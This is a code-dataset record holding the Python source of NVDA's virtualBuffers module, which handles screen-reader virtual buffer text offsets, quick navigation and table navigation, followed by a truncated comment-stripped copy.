hexsha stringlengths 40 40 | size int64 2 1.02M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 2 1.02M | avg_line_length float64 1 417k | max_line_length int64 1 987k | alphanum_fraction float64 0 1 | content_no_comment stringlengths 0 1.01M | is_comment_constant_removed bool 1
class | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f718f6c4067656037123e38cebf5af9768e2732f | 28,363 | py | Python | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | 6 | 2021-03-08T07:28:08.000Z | 2022-02-23T02:48:23.000Z | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | null | null | null | source/virtualBuffers/__init__.py | GdePaulo/nvda | 71c385eae1d7f77c47a0871a690c1142c4c724e2 | [
"bzip2-1.0.6"
] | 2 | 2021-07-16T00:25:27.000Z | 2022-03-24T08:36:36.000Z | # -*- coding: UTF-8 -*-
#virtualBuffers/__init__.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2007-2017 NV Access Limited, Peter Vágner
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
# Symbols that are escaped in the attributes string.
ord(u":"): r"\\:",
ord(u";"): r"\\;",
ord(u"\\"): u"\\\\\\\\",
}
# Symbols that must be escaped for a regular expression.
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
# A lambda that coerces a value to a string and escapes characters suitable for a regular expression.
escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
# Single option.
attribs = (attribs,)
# All options will match against all requested attributes,
# so first build the list of requested attributes.
for option in attribs:
for name in option:
reqAttrs.append(name)
# Now build the regular expression.
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
# The value isn't tested for this attribute, so match any (or no) value.
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
# We do this because we don't want to do this if they're not needed at all.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
if not any((docHandle.value, ID.value)):
raise LookupError("Neither docHandle nor ID found for offset %d" % offset)
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getBoundingRectFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
if not o:
raise LookupError("no NVDAObject at offset %d" % offset)
if o.hasIrrelevantLocation:
raise LookupError("Object is off screen, invisible or has no location")
return o.location
def _getNVDAObjectFromOffset(self,offset):
try:
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
except LookupError:
log.debugWarning("Couldn't get NVDAObject from offset %d" % offset)
return None
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def _getPlaceholderAttribute(self, attrs, placeholderAttrsKey):
"""Gets the placeholder attribute to be used.
@return: The placeholder attribute when there is no content within the ControlField.
None when the ControlField has content.
@note: The content is considered empty if it holds a single space.
"""
placeholder = attrs.get(placeholderAttrsKey)
# For efficiency, only check if it is valid to return placeholder when we have a placeholder value to return.
if not placeholder:
return None
# Get the start and end offsets for the field. This can be used to check if the field has any content.
try:
start, end = self._getOffsetsFromFieldIdentifier(
int(attrs.get('controlIdentifier_docHandle')),
int(attrs.get('controlIdentifier_ID')))
except (LookupError, ValueError):
log.debugWarning("unable to get offsets used to fetch content")
return placeholder
else:
valueLen = end - start
if not valueLen: # value is empty, use placeholder
return placeholder
# Because fetching the content of the field could result in a large amount of text
# we only do it in order to check for space.
# We first compare the length by comparing the offsets, if the length is less than 2 (ie
# could hold space)
if valueLen < 2:
controlFieldText = self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text
if not controlFieldText or controlFieldText == ' ':
return placeholder
return None
def _getFieldsInRange(self,start,end):
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in range(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
return self._getFieldsInRange(start,end)
def _getWordOffsets(self,offset):
#Use VBuf_getBufferLineOffsets with out screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
# convert some table attributes to ints
for attr in ("table-id","table-rownumber","table-columnnumber","table-rowsspanned","table-columnsspanned"):
attrVal=attrs.get(attr)
if attrVal is not None:
attrs[attr]=int(attrVal)
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("role") in (controlTypes.ROLE_LANDMARK, controlTypes.ROLE_REGION):
attrs['alwaysReportName'] = True
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
strippedCharsFromStart = attrs.get("strippedCharsFromStart")
if strippedCharsFromStart is not None:
assert strippedCharsFromStart.isdigit(), "strippedCharsFromStart isn't a digit, %r" % strippedCharsFromStart
attrs["strippedCharsFromStart"] = int(strippedCharsFromStart)
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == textInfos.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
elif unit == textInfos.UNIT_FORMATFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateTextFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def activate(self):
self.obj._activatePosition(info=self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(browseMode.BrowseModeDocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
def prepare(self):
if not self.rootNVDAObject.appModule.helperLocalBindingHandle:
# #5758: If NVDA starts with a document already in focus, there will have been no focus event to inject nvdaHelper yet.
# So at very least don't try to prepare a virtualBuffer as it will fail.
# The user will most likely need to manually move focus away and back again to allow this virtualBuffer to work.
log.debugWarning("appModule has no binding handle to injected code, can't prepare virtualBuffer yet.")
return
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
super(VirtualBuffer,self).terminate()
if not self.VBufHandle:
return
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(
name=f"{self.__class__.__module__}.{self.loadBuffer.__qualname__}",
target=self._loadBuffer).start(
)
def _loadBuffer(self):
try:
if log.isEnabledFor(log.DEBUG):
startTime = time.time()
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(
self.rootNVDAObject.appModule.helperLocalBindingHandle,
self.rootDocHandle,self.rootID,
self.backendName
)
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
if log.isEnabledFor(log.DEBUG):
log.debug("Buffer load took %.3f sec, %d chars" % (
time.time() - startTime,
NVDAHelper.localLib.VBuf_getTextLength(self.VBufHandle)))
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
ui.message(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=str(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
@abstractmethod
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
@abstractmethod
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
ui.message(_("Use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
def _searchableAttributesForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
raise NotImplementedError
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def _getTableCellAt(self,tableID,startPos,row,column):
try:
return next(self._iterTableCells(tableID,row=row,column=column))
except StopIteration:
raise LookupError
def _iterTableCells(self, tableID, startPos=None, direction="next", row=None, column=None):
attrs = {"table-id": [str(tableID)]}
# row could be 0.
if row is not None:
attrs["table-rownumber"] = [str(row)]
if column is not None:
attrs["table-columnnumber"] = [str(column)]
results = self._iterNodesByAttribs(attrs, pos=startPos, direction=direction)
if not startPos and not row and not column and direction == "next":
# The first match will be the table itself, so skip it.
next(results)
for item in results:
yield item.textInfo
def _getNearestTableCell(self, tableID, startPos, origRow, origCol, origRowSpan, origColSpan, movement, axis):
# Determine destination row and column.
destRow = origRow
destCol = origCol
if axis == "row":
destRow += origRowSpan if movement == "next" else -1
elif axis == "column":
destCol += origColSpan if movement == "next" else -1
if destCol < 1:
# Optimisation: We're definitely at the edge of the column.
raise LookupError
# Optimisation: Try searching for exact destination coordinates.
# This won't work if they are covered by a cell spanning multiple rows/cols, but this won't be true in the majority of cases.
try:
return self._getTableCellAt(tableID,startPos,destRow,destCol)
except LookupError:
pass
# Cells are grouped by row, so in most cases, we simply need to search in the right direction.
for info in self._iterTableCells(tableID, direction=movement, startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
elif row > destRow and movement == "next":
# Optimisation: We've gone forward past destRow, so we know we won't find the cell.
# We can't reverse this logic when moving backwards because there might be a prior cell on an earlier row which spans multiple rows.
break
if axis == "row" or (axis == "column" and movement == "previous"):
# In most cases, there's nothing more to try.
raise LookupError
else:
# We're moving forward by column.
# In this case, there might be a cell on an earlier row which spans multiple rows.
# Therefore, try searching backwards.
for info in self._iterTableCells(tableID, direction="previous", startPos=startPos):
_ignore, row, col, rowSpan, colSpan = self._getTableCellCoords(info)
if row <= destRow < row + rowSpan and col <= destCol < col + colSpan:
return info
else:
raise LookupError
def _isSuitableNotLinkBlock(self, textRange):
return (textRange._endOffset - textRange._startOffset) >= self.NOT_LINK_BLOCK_MIN_LEN
def getEnclosingContainerRange(self, textRange):
formatConfig=config.conf['documentFormatting'].copy()
formatConfig.update({"reportBlockQuotes":True,"reportTables":True,"reportLists":True,"reportFrames":True})
controlFields=[]
for cmd in textRange.getTextWithFields():
if not isinstance(cmd,textInfos.FieldCommand) or cmd.command!="controlStart":
break
controlFields.append(cmd.field)
containerField=None
while controlFields:
field=controlFields.pop()
if field.getPresentationCategory(controlFields,formatConfig)==field.PRESCAT_CONTAINER or field.get("landmark"):
containerField=field
break
if not containerField: return None
docHandle=int(containerField['controlIdentifier_docHandle'])
ID=int(containerField['controlIdentifier_ID'])
offsets = textRange._getOffsetsFromFieldIdentifier(docHandle,ID)
return self.makeTextInfo(textInfos.offsets.Offsets(*offsets))
@classmethod
def changeNotify(cls, rootDocHandle, rootID):
try:
queueHandler.queueFunction(queueHandler.eventQueue, cls.rootIdentifiers[rootDocHandle, rootID]._handleUpdate)
except KeyError:
pass
def _handleUpdate(self):
"""Handle an update to this buffer.
"""
if not self.VBufHandle:
# #4859: The buffer was unloaded after this method was queued.
return
braille.handler.handleUpdate(self)
def getControlFieldForNVDAObject(self, obj):
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
objId = str(objId)
info = self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
for item in info.getTextWithFields():
if not isinstance(item, textInfos.FieldCommand) or not item.field:
continue
fieldId = item.field.get("controlIdentifier_ID")
if fieldId == objId:
return item.field
raise LookupError
def _isNVDAObjectInApplication_noWalk(self, obj):
inApp = super(VirtualBuffer, self)._isNVDAObjectInApplication_noWalk(obj)
if inApp is not None:
return inApp
# If the object is in the buffer, it's definitely not in an application.
try:
docHandle, objId = self.getIdentifierFromNVDAObject(obj)
except:
log.debugWarning("getIdentifierFromNVDAObject failed. "
"Object probably died while walking ancestors.", exc_info=True)
return None
node = VBufRemote_nodeHandle_t()
if not self.VBufHandle:
return None
try:
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.VBufHandle, docHandle, objId,ctypes.byref(node))
except WindowsError:
return None
if node:
return False
return None
__gestures = {
"kb:NVDA+f5": "refreshBuffer",
"kb:NVDA+v": "toggleScreenLayout",
}
| 38.906722 | 212 | 0.741776 |
import time
import threading
import ctypes
import collections
import itertools
import weakref
import wx
import review
import NVDAHelper
import XMLFormatting
import scriptHandler
from scriptHandler import isScriptWaiting, willSayAllResume
import speech
import NVDAObjects
import api
import sayAllHandler
import controlTypes
import textInfos.offsets
import config
import cursorManager
import browseMode
import gui
import eventHandler
import braille
import queueHandler
from logHandler import log
import ui
import aria
import nvwave
import treeInterceptorHandler
import watchdog
from abc import abstractmethod
VBufStorage_findDirection_forward=0
VBufStorage_findDirection_back=1
VBufStorage_findDirection_up=2
VBufRemote_nodeHandle_t=ctypes.c_ulonglong
class VBufStorage_findMatch_word(str):
pass
VBufStorage_findMatch_notEmpty = object()
FINDBYATTRIBS_ESCAPE_TABLE = {
ord(u":"): r"\\:",
ord(u";"): r"\\;",
ord(u"\\"): u"\\\\\\\\",
}
FINDBYATTRIBS_ESCAPE_TABLE.update({(ord(s), u"\\" + s) for s in u"^$.*+?()[]{}|"})
def _prepareForFindByAttributes(attribs):
escape = lambda val: str(val).translate(FINDBYATTRIBS_ESCAPE_TABLE)
reqAttrs = []
regexp = []
if isinstance(attribs, dict):
attribs = (attribs,)
for option in attribs:
for name in option:
reqAttrs.append(name)
for option in attribs:
optRegexp = []
for name in reqAttrs:
optRegexp.append("%s:" % escape(name))
values = option.get(name)
if not values:
optRegexp.append(r"(?:\\;|[^;])*;")
elif values[0] is VBufStorage_findMatch_notEmpty:
# There must be a value for this attribute.
optRegexp.append(r"(?:\\;|[^;])+;")
elif isinstance(values[0], VBufStorage_findMatch_word):
# Assume all are word matches.
optRegexp.append(r"(?:\\;|[^;])*\b(?:")
optRegexp.append("|".join(escape(val) for val in values))
optRegexp.append(r")\b(?:\\;|[^;])*;")
else:
# Assume all are exact matches or None (must not exist).
optRegexp.append("(?:" )
optRegexp.append("|".join((escape(val)+u';') if val is not None else u';' for val in values))
optRegexp.append(")")
regexp.append("".join(optRegexp))
return u" ".join(reqAttrs), u"|".join(regexp)
class VirtualBufferQuickNavItem(browseMode.TextInfoQuickNavItem):
def __init__(self,itemType,document,vbufNode,startOffset,endOffset):
textInfo=document.makeTextInfo(textInfos.offsets.Offsets(startOffset,endOffset))
super(VirtualBufferQuickNavItem,self).__init__(itemType,document,textInfo)
docHandle=ctypes.c_int()
ID=ctypes.c_int()
NVDAHelper.localLib.VBuf_getIdentifierFromControlFieldNode(document.VBufHandle, vbufNode, ctypes.byref(docHandle), ctypes.byref(ID))
self.vbufFieldIdentifier=(docHandle.value,ID.value)
self.vbufNode=vbufNode
@property
def obj(self):
return self.document.getNVDAObjectFromIdentifier(*self.vbufFieldIdentifier)
@property
def label(self):
attrs = {}
def propertyGetter(prop):
if not attrs:
# Lazily fetch the attributes the first time they're needed.
attrs.update(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1]))
return attrs.get(prop)
return self._getLabelForProperties(propertyGetter)
def isChild(self,parent):
if self.itemType == "heading":
try:
if (int(self.textInfo._getControlFieldAttribs(self.vbufFieldIdentifier[0], self.vbufFieldIdentifier[1])["level"])
> int(parent.textInfo._getControlFieldAttribs(parent.vbufFieldIdentifier[0], parent.vbufFieldIdentifier[1])["level"])):
return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
class VirtualBufferTextInfo(browseMode.BrowseModeDocumentTextInfo,textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
